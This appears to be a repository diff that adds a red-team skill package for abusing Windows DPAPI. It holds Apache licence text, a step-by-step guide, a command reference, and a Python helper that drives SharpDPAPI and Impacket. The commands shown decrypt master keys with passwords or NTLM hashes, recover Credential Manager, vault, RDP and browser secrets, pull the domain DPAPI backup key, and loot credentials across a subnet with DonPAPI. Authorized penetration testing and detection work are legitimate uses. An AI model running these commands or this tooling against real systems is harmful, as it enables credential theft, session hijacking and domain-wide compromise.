      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,209 @@
 ---
 name: abusing-dpapi-for-credential-access
 description: Extract DPAPI-protected secrets such as credentials and browser data offline and online.
 domain: cybersecurity
 subdomain: red-teaming
 tags:
 - red-team
 - credential-access
 - dpapi
 - sharpdpapi
 - post-exploitation
 - active-directory
 - windows
 - mimikatz
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.CM-01
 mitre_attack:
 - T1555.004
 ---
 # Abusing DPAPI for Credential Access
 > **Legal Notice:** This skill is for authorized penetration testing, red-team engagements, and educational purposes only. Extracting credentials from systems you do not own or lack explicit written authorization to test is illegal and may violate computer fraud and abuse laws. Always operate within a signed rules-of-engagement and document every action.
 ## Overview
 The Windows Data Protection API (DPAPI) is the operating system's built-in symmetric-encryption service that applications use to protect secrets at rest: saved RDP and Windows Credential Manager credentials, web and Wi-Fi credentials in the Credential Vault, browser saved logins and cookies (Chrome/Edge), KeePass keys, certificate private keys, and Scheduled Task passwords. DPAPI derives a per-user (or per-machine) **master key** from the user's password (or the machine account secret), and that master key encrypts individual "DPAPI blobs." The encrypted master keys live under `%APPDATA%\Microsoft\Protect\<SID>\` (user) and `%WINDIR%\System32\Microsoft\Protect\` (machine).
 Red teamers abuse DPAPI to recover plaintext secrets after gaining a foothold, mapping to MITRE ATT&CK **T1555.004 (Credentials from Password Stores: Windows Credential Manager)**. There are three primary decryption paths:
 1. **Online / context-based** — running as the target user, DPAPI APIs (`CryptUnprotectData`) transparently decrypt the user's blobs. SharpDPAPI's `/unprotect` flag uses this.
 2. **Offline with the user password or NTLM hash** — decrypt the user's master keys with `/password:` or `/ntlm:`, then decrypt the blobs offline (great for triaged files pulled from a host).
 3. **Domain-wide with the DPAPI backup key** — Domain Admins can extract the domain's RSA DPAPI backup key (`.pvk`) once, then decrypt *any* domain user's master keys forever, online or offline, with `/pvk:`.
 The canonical tooling is **SharpDPAPI** (GhostPack, a C# port of Mimikatz DPAPI functionality) for Windows, **SharpChrome** for browser secrets, and **Mimikatz** (`dpapi::*`) as the original implementation. On Linux, Impacket's `dpapi.py` and `donpapi` perform remote/offline triage.
 ## When to Use
 - After compromising a Windows host where the user has saved RDP, browser, or vault credentials worth harvesting for lateral movement.
 - When you hold a user's password or NTLM hash and want to decrypt their DPAPI-protected secrets offline.
 - When you have Domain Admin and want to obtain the domain DPAPI backup key to decrypt any user's protected data across the estate.
 - When triaging exfiltrated `Credentials`, `Vault`, or `Protect` directories from disk images.
 - During purple-team exercises to validate detection of DPAPI master-key access and LSASS/Protect-folder reads.
 ## Prerequisites
 - An authorized foothold (interactive session, beacon, or remote admin) on the target Windows host.
 - Knowledge of the target user's SID, and one of: the user's session, password, NTLM hash, or Domain Admin rights for the backup key.
 - Tooling (compile from source or use release binaries; obtain only from official upstreams):
 ```bash
 # SharpDPAPI / SharpChrome (GhostPack) — build with Visual Studio / msbuild
 git clone https://github.com/GhostPack/SharpDPAPI.git
 # Open SharpDPAPI.sln and build Release, or:
 msbuild SharpDPAPI.sln /p:Configuration=Release
 # Mimikatz (original DPAPI implementation)
 # https://github.com/gentilkiwi/mimikatz/releases
 # Linux remote/offline triage (Impacket)
 pipx install impacket            # provides dpapi.py / impacket-dpapi
 pipx install donpapi             # https://github.com/login-securite/DonPAPI
 ```
 ## Objectives
 - Triage a host for DPAPI-protected credential, vault, RDP, and certificate blobs.
 - Decrypt user master keys online (`/unprotect`), with a password/hash, or with the domain backup key.
 - Recover plaintext Credential Manager and Vault secrets.
 - Extract browser saved logins and cookies with SharpChrome.
 - Obtain and reuse the domain DPAPI backup key for estate-wide decryption.
 ## MITRE ATT&CK Mapping
 | Technique ID | Name | Tactic | Relevance |
 |--------------|------|--------|-----------|
 | T1555.004 | Credentials from Password Stores: Windows Credential Manager | Credential Access | DPAPI protects Credential Manager / Vault entries; decrypting master keys and blobs recovers these stored credentials. |
 | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Credential Access | SharpChrome decrypts DPAPI-protected Chrome/Edge logins, cookies, and state keys. |
 | T1003 | OS Credential Dumping | Credential Access | Extracting master keys / backup keys is a form of credential material dumping. |
 ## Workflow
 ### 1. Triage the host for DPAPI blobs
 Run the SharpDPAPI `triage` command in the user's context to automatically enumerate and (where possible) decrypt credentials, vaults, RDG/RDP, and certificates:
 ```powershell
 # Online triage in the current user's context (uses CryptUnprotectData)
 SharpDPAPI.exe triage /unprotect
 # Machine triage (requires local admin / SYSTEM) for machine-scoped blobs
 SharpDPAPI.exe machinetriage
 ```
 ### 2. Decrypt user master keys offline (password or NTLM hash)
 If you hold the user's password or hash, decrypt their master keys to a `{GUID}:SHA1` mapping you can reuse against individual blobs:
 ```powershell
 # Decrypt all of the current/specified user's master keys with the password
 SharpDPAPI.exe masterkeys /password:CorrectHorseBatteryStaple
 # Decrypt master keys with the user's NTLM hash instead of the password
 SharpDPAPI.exe masterkeys /ntlm:cc36cf7a8514893efccd332446158b1a
 # Output is GUID:SHA1 lines — feed them to credentials/vaults commands
 ```
 ### 3. Recover Credential Manager and Vault secrets
 Use the decrypted master-key mapping (or `/pvk:`) to decrypt the stored credentials and vault entries:
 ```powershell
 # Decrypt Credential Manager blobs with a GUID:SHA1 mapping
 SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1
 # Or point at a target Credentials folder and decrypt with the domain backup key
 SharpDPAPI.exe credentials /target:C:\Users\bob\AppData\Local\Microsoft\Credentials\ /pvk:backupkey.pvk
 # Decrypt Credential Vault entries
 SharpDPAPI.exe vaults /pvk:backupkey.pvk
 ```
 ### 4. Decrypt RDP, KeePass, and certificate secrets
 ```powershell
 # Saved RDCMan.settings RDP passwords (current user context)
 SharpDPAPI.exe rdg /unprotect
 # KeePass DPAPI-protected master keys
 SharpDPAPI.exe keepass /unprotect
 # Certificate private keys (export usable .pem with /showall for all stores)
 SharpDPAPI.exe certificates /unprotect /showall
 ```
 ### 5. Extract browser credentials with SharpChrome
 SharpChrome decrypts Chrome/Edge logins and cookies. Modern Chromium uses an App-Bound "state key" that SharpChrome resolves via DPAPI:
 ```powershell
 # Decrypt saved logins for the current user
 SharpChrome.exe logins /unprotect
 # Decrypt cookies (useful for session hijacking) in a target folder
 SharpChrome.exe cookies /target:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /pvk:backupkey.pvk
 # Resolve the AES state key explicitly
 SharpChrome.exe statekeys /unprotect
 ```
 ### 6. Obtain the domain DPAPI backup key (Domain Admin)
 With Domain Admin, retrieve the domain's RSA DPAPI backup private key once. This key decrypts every domain user's master keys indefinitely:
 ```powershell
 # Pull and save the domain backup key as a .pvk via the MS-BKRP RPC interface
 SharpDPAPI.exe backupkey /server:dc01.corp.local /file:backupkey.pvk
 ```
 Then decrypt any user's master keys offline with it:
 ```powershell
 SharpDPAPI.exe masterkeys /pvk:backupkey.pvk /target:C:\Users\alice\AppData\Roaming\Microsoft\Protect\
 ```
 ### 7. Remote / Linux-based triage (Impacket / DonPAPI)
 From a Linux operator box, harvest and decrypt DPAPI secrets across hosts:
 ```bash
 # Decrypt a single masterkey file with Impacket using the domain backup key
 impacket-dpapi masterkey -file <masterkey_file> -pvk backupkey.pvk
 # Decrypt a credential blob with the recovered masterkey
 impacket-dpapi credential -file <cred_blob> -key 0x<decrypted_masterkey>
 # Mass remote DPAPI looting across hosts with DonPAPI
 donpapi collect -u alice -p 'Password123!' -d corp.local --target 10.0.0.0/24
 ```
 ## Tools and Resources
 | Tool | Purpose | Link |
 |------|---------|------|
 | SharpDPAPI | Windows DPAPI triage/decryption (C#) | https://github.com/GhostPack/SharpDPAPI |
 | SharpChrome | Chromium logins/cookies/state-key decryption | https://github.com/GhostPack/SharpDPAPI |
 | Mimikatz | Original DPAPI (`dpapi::*`) implementation | https://github.com/gentilkiwi/mimikatz |
 | Impacket dpapi.py | Remote/offline DPAPI decryption (Python) | https://github.com/fortra/impacket |
 | DonPAPI | Mass remote DPAPI looting | https://github.com/login-securite/DonPAPI |
 | HackTricks DPAPI | Technique reference | https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html |
 ## Detection and OPSEC Notes
 - Master-key access and reads of `\Microsoft\Protect\` and `\Microsoft\Credentials\` are detectable; `backupkey` triggers an MS-BKRP RPC call to the DC.
 - The `/unprotect` (online) path is the stealthiest single-host option but only works as the live user.
 - Defenders should monitor for Sysmon process access to LSASS and abnormal access to Protect/Credentials folders (DE.CM-01).
 ## Validation Criteria
 - [ ] Host triaged with `SharpDPAPI triage` / `machinetriage`.
 - [ ] User master keys decrypted via `/unprotect`, `/password:`, `/ntlm:`, or `/pvk:`.
 - [ ] Credential Manager and Vault secrets recovered.
 - [ ] RDP / KeePass / certificate secrets extracted where present.
 - [ ] Browser logins/cookies decrypted with SharpChrome.
 - [ ] Domain DPAPI backup key retrieved with Domain Admin (if in scope) and reused offline.
 - [ ] All recovered secrets documented with source host/user and ROE adherence confirmed.
@@ -0,0 +1,73 @@
 # SharpDPAPI / DPAPI — Command Reference
 ## SharpDPAPI User Commands
 | Command | Purpose | Example |
 |---------|---------|---------|
 | `triage` | Auto-run credentials, vaults, rdg, certificates | `SharpDPAPI.exe triage /unprotect` |
 | `masterkeys` | Decrypt user master keys (GUID:SHA1 output) | `SharpDPAPI.exe masterkeys /password:Pass` |
 | `credentials` | Decrypt Credential Manager blobs | `SharpDPAPI.exe credentials /pvk:key.pvk` |
 | `vaults` | Decrypt Credential Vault entries | `SharpDPAPI.exe vaults /pvk:key.pvk` |
 | `rdg` | Decrypt RDCMan.settings RDP passwords | `SharpDPAPI.exe rdg /unprotect` |
 | `keepass` | Decrypt KeePass DPAPI keys | `SharpDPAPI.exe keepass /unprotect` |
 | `certificates` | Decrypt certificate private keys | `SharpDPAPI.exe certificates /unprotect /showall` |
 ## SharpDPAPI Machine Commands (require admin/SYSTEM)
 | Command | Purpose |
 |---------|---------|
 | `machinemasterkeys` | Decrypt machine master keys (uses DPAPI_SYSTEM LSA secret) |
 | `machinecredentials` | Decrypt machine credential blobs |
 | `machinevaults` | Decrypt machine vault entries |
 | `machinetriage` | Run all machine-scoped triage commands |
 ## SharpDPAPI Supporting Commands
 | Command | Purpose | Example |
 |---------|---------|---------|
 | `backupkey` | Retrieve domain DPAPI backup key (.pvk) via MS-BKRP | `SharpDPAPI.exe backupkey /server:dc01 /file:key.pvk` |
 ## Common Flags
 | Flag | Meaning |
 |------|---------|
 | `/unprotect` | Use live `CryptUnprotectData` in current user context (online) |
 | `/password:<pw>` | Decrypt master keys with the user's plaintext password |
 | `/ntlm:<hash>` | Decrypt master keys with the user's NTLM hash |
 | `/pvk:<file>` | Use domain backup private key for decryption |
 | `/mkfile:<file>` | Provide a specific master key file |
 | `/server:<dc>` | Target DC for backupkey retrieval |
 | `/target:<path>` | Target file/folder to decrypt |
 | `/rpc` | Use RPC to request master key decryption from a DC |
 | `/showall` | Show all certificate stores / verbose output |
 ## SharpChrome Commands
 | Command | Purpose | Example |
 |---------|---------|---------|
 | `logins` | Decrypt saved browser logins | `SharpChrome.exe logins /unprotect` |
 | `cookies` | Decrypt browser cookies | `SharpChrome.exe cookies /pvk:key.pvk` |
 | `statekeys` | Decrypt the AES app-bound state key | `SharpChrome.exe statekeys /unprotect` |
 ## Impacket dpapi.py (Linux)
 | Subcommand | Purpose | Example |
 |------------|---------|---------|
 | `masterkey` | Decrypt a master key file | `impacket-dpapi masterkey -file MK -pvk key.pvk` |
 | `credential` | Decrypt a credential blob | `impacket-dpapi credential -file CRED -key 0x<mk>` |
 | `vault` | Decrypt vault policy/creds | `impacket-dpapi vault -vpol VPOL -vcrd VCRD -key 0x<mk>` |
 | `backupkeys` | Retrieve domain backup keys | `impacket-dpapi backupkeys -t corp.local/admin@dc -pvk out.pvk` |
 ## Key File Locations
 | Path | Contents |
 |------|----------|
 | `%APPDATA%\Microsoft\Protect\<SID>\` | User master keys |
 | `%WINDIR%\System32\Microsoft\Protect\` | Machine master keys |
 | `%LOCALAPPDATA%\Microsoft\Credentials\` | Credential Manager blobs |
 | `%APPDATA%\Microsoft\Vault\` / `%LOCALAPPDATA%\Microsoft\Vault\` | Credential Vault |
 ## External References
 - SharpDPAPI README: https://github.com/GhostPack/SharpDPAPI
 - Impacket: https://github.com/fortra/impacket
@@ -0,0 +1,30 @@
 # Standards and References — Abusing DPAPI for Credential Access
 ## NIST CSF 2.0
 | ID | Name | Rationale |
 |----|------|-----------|
 | DE.CM-01 | Networks and network services are monitored to find potentially adverse events | DPAPI abuse generates detectable signals (MS-BKRP backup-key RPC to the DC, Protect/Credentials folder access, LSASS access) that monitoring must surface. |
 ## MITRE ATT&CK
 | Technique ID | Name | Tactic | Rationale |
 |--------------|------|--------|-----------|
 | T1555.004 | Credentials from Password Stores: Windows Credential Manager | Credential Access | DPAPI protects Credential Manager/Vault entries; decrypting them recovers stored credentials. |
 | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Credential Access | SharpChrome decrypts DPAPI-protected browser logins/cookies. |
 | T1003 | OS Credential Dumping | Credential Access | Extracting master keys and the domain backup key dumps credential material. |
 ## Supporting Frameworks and Standards
 - **MS-BKRP** — BackupKey Remote Protocol; the RPC interface used to retrieve the domain DPAPI backup key.
 - **MS-DPSP / DPAPI** — Microsoft's Data Protection API specification governing master keys and blob protection.
 - **D3FEND** — Credential Eviction / Password Rotation as mitigations after DPAPI compromise.
 ## Official Resources
 - SharpDPAPI / SharpChrome: https://github.com/GhostPack/SharpDPAPI
 - Mimikatz: https://github.com/gentilkiwi/mimikatz
 - Impacket: https://github.com/fortra/impacket
 - DonPAPI: https://github.com/login-securite/DonPAPI
 - HackTricks DPAPI: https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html
 - SpecterOps "Operational Guidance for Offensive User DPAPI Abuse": https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
@@ -0,0 +1,154 @@
 #!/usr/bin/env python3
 # For authorized penetration testing and educational environments only.
 # Usage against targets without prior mutual written consent is illegal.
 # It is the end user's responsibility to obey all applicable laws.
 """DPAPI triage orchestrator.
 Locates DPAPI artifacts (master keys, Credential Manager blobs, Vault entries)
 on a mounted/exfiltrated user profile and drives SharpDPAPI (on Windows) or
 Impacket's dpapi.py (cross-platform) to decrypt them with a supplied password,
 NTLM hash, or domain backup key (.pvk).
 This is an operator helper: it builds and runs the real tool commands and
 parses their output; it does not reimplement DPAPI cryptography.
 """
 import argparse
 import os
 import shutil
 import subprocess
 import sys
 from datetime import datetime, timezone
 # Standard relative locations inside a Windows user profile.
 PROTECT_REL = os.path.join("AppData", "Roaming", "Microsoft", "Protect")
 CRED_REL = os.path.join("AppData", "Local", "Microsoft", "Credentials")
 VAULT_LOCAL_REL = os.path.join("AppData", "Local", "Microsoft", "Vault")
 VAULT_ROAM_REL = os.path.join("AppData", "Roaming", "Microsoft", "Vault")
 def find_tool(candidates):
    """Return the first available tool path from candidates, else None."""
    for name in candidates:
        path = shutil.which(name)
        if path:
            return path
    return None
 def enumerate_artifacts(profile):
    """Walk a user profile and collect DPAPI artifact file paths."""
    found = {"masterkeys": [], "credentials": [], "vaults": []}
    mapping = {
        "masterkeys": os.path.join(profile, PROTECT_REL),
        "credentials": os.path.join(profile, CRED_REL),
        "vaults": os.path.join(profile, VAULT_LOCAL_REL),
    }
    for key, base in mapping.items():
        if not os.path.isdir(base):
            continue
        for root, _dirs, files in os.walk(base):
            for fname in files:
                # Master keys are GUID-named; skip preferred/BK marker files noise.
                found[key].append(os.path.join(root, fname))
    # Also include roaming vault if present.
    vroam = os.path.join(profile, VAULT_ROAM_REL)
    if os.path.isdir(vroam):
        for root, _dirs, files in os.walk(vroam):
            for fname in files:
                found["vaults"].append(os.path.join(root, fname))
    return found
 def run_cmd(cmd, timeout):
    """Run an external command and return (rc, stdout, stderr)."""
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return proc.returncode, proc.stdout, proc.stderr
    except FileNotFoundError:
        return 127, "", f"tool not found: {cmd[0]}"
    except subprocess.TimeoutExpired:
        return 124, "", f"timeout after {timeout}s"
 def decrypt_masterkey_impacket(tool, mk_file, pvk, timeout):
    """Decrypt one master key file via impacket-dpapi using a backup .pvk."""
    cmd = [tool, "masterkey", "-file", mk_file, "-pvk", pvk]
    rc, out, err = run_cmd(cmd, timeout)
    return {"file": mk_file, "rc": rc, "output": (out or err).strip()[:2000]}
 def sharpdpapi_triage(tool, profile, pvk, password, ntlm, timeout):
    """Build and run a SharpDPAPI triage command appropriate to the inputs."""
    cmd = [tool, "triage"]
    if pvk:
        cmd += [f"/pvk:{pvk}"]
    elif password:
        cmd += [f"/password:{password}"]
    elif ntlm:
        cmd += [f"/ntlm:{ntlm}"]
    else:
        cmd += ["/unprotect"]
    rc, out, err = run_cmd(cmd, timeout)
    return {"rc": rc, "output": (out or err).strip()}
 def main():
    parser = argparse.ArgumentParser(description="Authorized DPAPI triage helper")
    parser.add_argument("--profile", help="Path to a (mounted) Windows user profile")
    parser.add_argument("--pvk", help="Domain DPAPI backup key (.pvk)")
    parser.add_argument("--password", help="User plaintext password")
    parser.add_argument("--ntlm", help="User NTLM hash")
    parser.add_argument("--mode", choices=["enumerate", "impacket", "sharpdpapi"],
                        default="enumerate",
                        help="enumerate artifacts, or drive a decryption tool")
    parser.add_argument("--timeout", type=int, default=120, help="Per-command timeout")
    args = parser.parse_args()
    ts = datetime.now(timezone.utc).isoformat()
    print(f"[*] DPAPI triage helper — {ts}")
    print("[!] Authorized use only. Confirm rules-of-engagement before proceeding.\n")
    if args.mode in ("enumerate", "impacket"):
        if not args.profile or not os.path.isdir(args.profile):
            print("[!] --profile must point to an existing user profile directory",
                  file=sys.stderr)
            sys.exit(2)
        artifacts = enumerate_artifacts(args.profile)
        for kind, items in artifacts.items():
            print(f"--- {kind.upper()} ({len(items)}) ---")
            for p in items:
                print(f"  {p}")
        if args.mode == "impacket":
            if not args.pvk:
                print("\n[!] --pvk required for impacket master key decryption",
                      file=sys.stderr)
                sys.exit(2)
            tool = find_tool(["impacket-dpapi", "dpapi.py"])
            if not tool:
                print("[!] impacket-dpapi not found. Install: pipx install impacket",
                      file=sys.stderr)
                sys.exit(2)
            print("\n=== Decrypting master keys with backup key ===")
            for mk in artifacts["masterkeys"]:
                res = decrypt_masterkey_impacket(tool, mk, args.pvk, args.timeout)
                print(f"  [{res['rc']}] {res['file']}")
                if res["output"]:
                    print(f"      {res['output'][:300]}")
        return
    # sharpdpapi mode (Windows operator host)
    tool = find_tool(["SharpDPAPI.exe", "SharpDPAPI"])
    if not tool:
        print("[!] SharpDPAPI not found on PATH. Build from "
              "https://github.com/GhostPack/SharpDPAPI", file=sys.stderr)
        sys.exit(2)
    result = sharpdpapi_triage(tool, args.profile, args.pvk, args.password,
                               args.ntlm, args.timeout)
    print("=== SharpDPAPI triage ===")
    print(result["output"])
    sys.exit(0 if result["rc"] == 0 else 1)
 if __name__ == "__main__":
    main()
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
